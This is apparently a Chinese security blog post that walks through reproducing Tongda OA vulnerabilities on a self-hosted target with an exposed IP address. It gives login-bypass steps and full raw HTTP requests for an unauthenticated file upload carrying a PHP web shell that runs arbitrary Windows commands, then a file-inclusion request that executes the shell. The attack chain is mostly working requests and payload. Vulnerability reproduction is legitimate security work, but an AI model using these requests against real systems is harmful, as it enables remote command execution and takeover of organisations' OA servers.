用老弟的服务器搭了个靶机就不打码了用完就关了

任意用户登录：影响版本：通达OA2017，V11.X<V11.5
通达oa远程命令执行：影响的版本有：V11版，2017版，2016版，2015版，2013增强版，2013版。

1、任意用户登录

1）登录处抓包

2）修改再发包 需修改以下三个地方： /logincheck.php /logincheck_code.php 删除cookie在post包中添加UID=1

3）用获取的SESSID访问/general/

(3)未授权文件上传
任意文件上传漏洞 /ispirit/im/upload.php

POST /ispirit/im/upload.php HTTP/1.1
Host: 49.233.3.2:8888
Content-Length: 658
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarypyfBh1YB4pV8McGB
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,zh-HK;q=0.8,ja;q=0.7,en;q=0.6,zh-TW;q=0.5
Cookie: PHPSESSID=123
Connection: close

------WebKitFormBoundarypyfBh1YB4pV8McGB
Content-Disposition: form-data; name="UPLOAD_MODE"

2
------WebKitFormBoundarypyfBh1YB4pV8McGB
Content-Disposition: form-data; name="P"

123
------WebKitFormBoundarypyfBh1YB4pV8McGB
Content-Disposition: form-data; name="DEST_UID"

1
------WebKitFormBoundarypyfBh1YB4pV8McGB
Content-Disposition: form-data; name="ATTACHMENT"; filename="jpg"
Content-Type: image/jpeg

<?php
$command=$_POST['cmd'];
$wsh = new COM('WScript.shell');
$exec = $wsh->exec("cmd /c ".$command);
$stdout = $exec->StdOut();
$stroutput = $stdout->ReadAll();
echo $stroutput;
?>
------WebKitFormBoundarypyfBh1YB4pV8McGB--

路径 2007/422124454.jpg

文件包含

POST /ispirit/interface/gateway.php HTTP/1.1
Host: 49.233.3.2:8888
Connection: keep-alive
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: python-requests/2.21.0
Content-Length: 69
Content-Type: application/x-www-form-urlencoded

json={"url":"/general/../../attach/im/2007/422124454.jpg"}&cmd=whoami

想要搭建环境本地复现的小伙伴可以公众号回复“通达OA源码”获取下载链接。